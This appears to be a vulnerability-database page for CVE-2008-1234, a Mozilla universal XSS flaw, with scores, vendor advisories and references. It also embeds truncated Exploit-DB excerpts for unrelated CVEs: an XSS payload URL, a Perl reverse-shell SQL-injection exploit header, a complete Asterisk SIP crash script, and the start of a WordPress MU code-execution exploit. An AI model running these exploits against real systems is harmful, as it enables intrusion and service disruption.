CVE-2008-1234
published 2008-03-27CVE-2008-1234: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
2.77%
84.8th percentile
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to inject arbitrary web script or HTML via event handlers, aka "Universal XSS using event handlers."
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 2.0.0.12 | — |
| mozilla | seamonkey | <= 1.1.8 | — |
| mozilla | thunderbird | <= 2.0.0.12 | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_ubuntu6.8MEDIUM
vendor_redhat4.3MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-94wq-jwp8-mvj5: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2
ghsa_unreviewed·2022-04-23
CVE-2008-1234 [MEDIUM] CWE-79 GHSA-94wq-jwp8-mvj5: Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to inject arbitrary web script or HTML via event handlers, aka "Universal XSS using event handlers."
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2008-05-06·CVSS 6.8
CVE-2008-1234 [MEDIUM] Thunderbird vulnerabilities
Title: Thunderbird vulnerabilities
Summary: Thunderbird vulnerabilities
Various flaws were discovered in the JavaScript engine. If a user had
JavaScript enabled and were tricked into opening a malicious email,
an attacker could escalate privileges within Thunderbird, perform
cross-site scripting attacks and/or execute arbitrary code with the
user's privileges. (CVE-2008-1233, CVE-2008-1234, CVE-2008-1235)
Several problems were discovered in Thunderbird which could lead to
crashes and memory corruption. If a user had JavaScript enabled and
were tricked into opening a malicious email, an attacker may be able
to execute arbitrary code with the user's privileges. (CVE-2008-1236,
CVE-2008-1237)
Instructions: After a standard system upgrade you need to restart Thunderbird to effect
the neces
Ubuntu
Firefox vulnerabilities
vendor_ubuntu·2008-03-26·CVSS 5.0
CVE-2008-1241 [MEDIUM] Firefox vulnerabilities
Title: Firefox vulnerabilities
Summary: Firefox vulnerabilities
Alexey Proskuryakov, Yosuke Hasegawa and Simon Montagu discovered flaws
in Firefox's character encoding handling. If a user were tricked into
opening a malicious web page, an attacker could perform cross-site
scripting attacks. (CVE-2008-0416)
Various flaws were discovered in the JavaScript engine. By tricking
a user into opening a malicious web page, an attacker could escalate
privileges within the browser, perform cross-site scripting attacks
and/or execute arbitrary code with the user's privileges.
(CVE-2008-1233, CVE-2008-1234, CVE-2008-1235)
Several problems were discovered in Firefox which could lead to crashes
and memory corruption. If a user were tricked into opening a malicious
web page, an attacker may be able to
Red Hat
universal XSS using event handlers
vendor_redhat·2008-03-25·CVSS 4.3
CVE-2008-1234 [MEDIUM] CWE-79 universal XSS using event handlers
universal XSS using event handlers
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to inject arbitrary web script or HTML via event handlers, aka "Universal XSS using event handlers."
No detection rules found.
Exploit-DB
IBM Rational ClearCase 7/8 - Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-5330 IBM Rational ClearCase 7/8 - Cross-Site Scripting
IBM Rational ClearCase 7/8 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32574/info
IBM Rational ClearCase is prone to a cross-site scripting vulnerability because the software fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects versions prior to Rational ClearCase 7.0.0.4 and 7.0.1.3.
http://www.example.com/ccrc/??''??script?alert(1234)?/script?=123
Exploit-DB
IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection
exploitdb·2008-06-22
CVE-2008-2835 IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection
IGSuite 3.2.4 - Reverse Shell / Blind SQL Injection
---
#!/usr/bin/perl
#
# 05/18/2008 - IGSuite 3.2.4 Blind SQL Injection - k`sOSe
#
# 05/21/2008 - Vendor notified
# 05/23/2008 - A patch was pushed via the igsuited daemon(not enabled by default)
# Fix: run igsuited --update-igsuite or upgrade to 3.2.5-beta.
#
# Tested on IGSuite 3.2.4 on linux with MySQL, needs nc(in path).
# Drops a reverse shell, use http://pentestmonkey.net/tools/php-reverse-shell/
#
#
# cohelet ~ # ./igsploit.pl localhost /cgi-bin / ./php-reverse-shell.php 1234
# IGSploit 0.1 - k`sOSe
#
# [*] Abusing blind SQL injection: ksose=qwerty
# [*] Logging in with username `ksose', password `qwerty'...
# [I] Found `formid' -> 12141384631aX7I
# [I] Logged in!
# [*] Uploading shell..
# [I] Found `formid' -> 1214138463vOl5x
# [
Exploit-DB
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash
exploitdb·2008-06-05
CVE-2008-2119 Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash
---
#!/usr/bin/perl -w
###############
# asterisk AST-2008-008
# by [email protected]
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode
use Getopt::Std;
use IO::Socket;
use strict;
my %args;
getopts("h:p:", \%args);
if (!$args{h} || !$args{p}) { usage(); }
my $sock = IO::Socket::INET->new(
Proto => 'udp',
PeerPort => $args{p},
PeerAddr => $args{h},
) or die "Could not create socket: $!\n";
$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";
sub usage {
print STDERR
qq{ $0
Usage: $0 -h -p
-h = host
-p = port
Example:
$0 -h target -p port
};
# milw0rm.com [2008-06-05]
Exploit-DB
WordPress MU < 1.3.2 - 'active_plugins' Code Execution
exploitdb·2008-02-05
CVE-2008-5695 WordPress MU < 1.3.2 - 'active_plugins' Code Execution
WordPress MU
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';
// Fix Snoopy
class SnoopyExt extends Snoopy {
function _prepare_post_body($formvars, $formfiles) {
if ( is_string($formvars) ) {
return $formvars;
}
return parent::_prepare_post_body($formvars, $formfiles);
}
}
set_time_limit( 0 );
// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = ''; // the contents of this file, if any, will be uploaded
$snoopy = new SnoopyExt();
$snoopy->maxredirs = 0;
$s
http://lists.opensuse.org/opensuse-security-announce/2008-04/msg00002.htmlhttp://rhn.redhat.com/errata/RHSA-2008-0208.htmlhttp://secunia.com/advisories/29391http://secunia.com/advisories/29526http://secunia.com/advisories/29539http://secunia.com/advisories/29541http://secunia.com/advisories/29547http://secunia.com/advisories/29548http://secunia.com/advisories/29550http://secunia.com/advisories/29558http://secunia.com/advisories/29560http://secunia.com/advisories/29607http://secunia.com/advisories/29616http://secunia.com/advisories/29645http://secunia.com/advisories/30016http://secunia.com/advisories/30094http://secunia.com/advisories/30105http://secunia.com/advisories/30192http://secunia.com/advisories/30327http://secunia.com/advisories/30370http://secunia.com/advisories/30620http://secunia.com/advisories/31043http://sunsolve.sun.com/search/document.do?assetkey=1-26-238492-1http://sunsolve.sun.com/search/document.do?assetkey=1-26-239546-1http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0128http://www.debian.org/security/2008/dsa-1532http://www.debian.org/security/2008/dsa-1534http://www.debian.org/security/2008/dsa-1535http://www.debian.org/security/2008/dsa-1574http://www.gentoo.org/security/en/glsa/glsa-200805-18.xmlhttp://www.kb.cert.org/vuls/id/466521http://www.mandriva.com/security/advisories?name=MDVSA-2008:080http://www.mandriva.com/security/advisories?name=MDVSA-2008:155http://www.mozilla.org/security/announce/2008/mfsa2008-14.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0207.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0209.htmlhttp://www.securityfocus.com/archive/1/490196/100/0/threadedhttp://www.securityfocus.com/bid/28448http://www.securitytracker.com/id?1019694http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.447313http://www.ubuntu.com/usn/usn-592-1http://www.ubuntu.com/usn/usn-605-1http://www.us-cert.gov/cas/techalerts/TA08-087A.htmlhttp://www.vupen.com/english/advisories/2008/0998/referenceshttp://www.vupen.com/english/advisories/2008/0999/referenceshttp://www.vupen.com/english/advisories/2008/1793/referenceshttp://www.vupen.com/english/advisories/2008/2091/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41455https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9551https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00058.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-May/msg00074.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-04/msg00002.htmlhttp://rhn.redhat.com/errata/RHSA-2008-0208.htmlhttp://secunia.com/advisories/29391http://secunia.com/advisories/29526http://secunia.com/advisories/29539http://secunia.com/advisories/29541http://secunia.com/advisories/29547http://secunia.com/advisories/29548http://secunia.com/advisories/29550http://secunia.com/advisories/29558http://secunia.com/advisories/29560http://secunia.com/advisories/29607http://secunia.com/advisories/29616http://secunia.com/advisories/29645http://secunia.com/advisories/30016http://secunia.com/advisories/30094http://secunia.com/advisories/30105http://secunia.com/advisories/30192http://secunia.com/advisories/30327http://secunia.com/advisories/30370http://secunia.com/advisories/30620http://secunia.com/advisories/31043http://sunsolve.sun.com/search/document.do?assetkey=1-26-238492-1http://sunsolve.sun.com/search/document.do?assetkey=1-26-239546-1http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0128http://www.debian.org/security/2008/dsa-1532http://www.debian.org/security/2008/dsa-1534http://www.debian.org/security/2008/dsa-1535http://www.debian.org/security/2008/dsa-1574http://www.gentoo.org/security/en/glsa/glsa-200805-18.xmlhttp://www.kb.cert.org/vuls/id/466521http://www.mandriva.com/security/advisories?name=MDVSA-2008:080http://www.mandriva.com/security/advisories?name=MDVSA-2008:155http://www.mozilla.org/security/announce/2008/mfsa2008-14.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0207.htmlhttp://www.redhat.com/support/errata/RHSA-2008-0209.htmlhttp://www.securityfocus.com/archive/1/490196/100/0/threadedhttp://www.securityfocus.com/bid/28448http://www.securitytracker.com/id?1019694http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.447313http://www.ubuntu.com/usn/usn-592-1http://www.ubuntu.com/usn/usn-605-1http://www.us-cert.gov/cas/techalerts/TA08-087A.htmlhttp://www.vupen.com/english/advisories/2008/0998/referenceshttp://www.vupen.com/english/advisories/2008/0999/referenceshttp://www.vupen.com/english/advisories/2008/1793/referenceshttp://www.vupen.com/english/advisories/2008/2091/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41455https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9551
+ 2 more references
2008-03-27
Published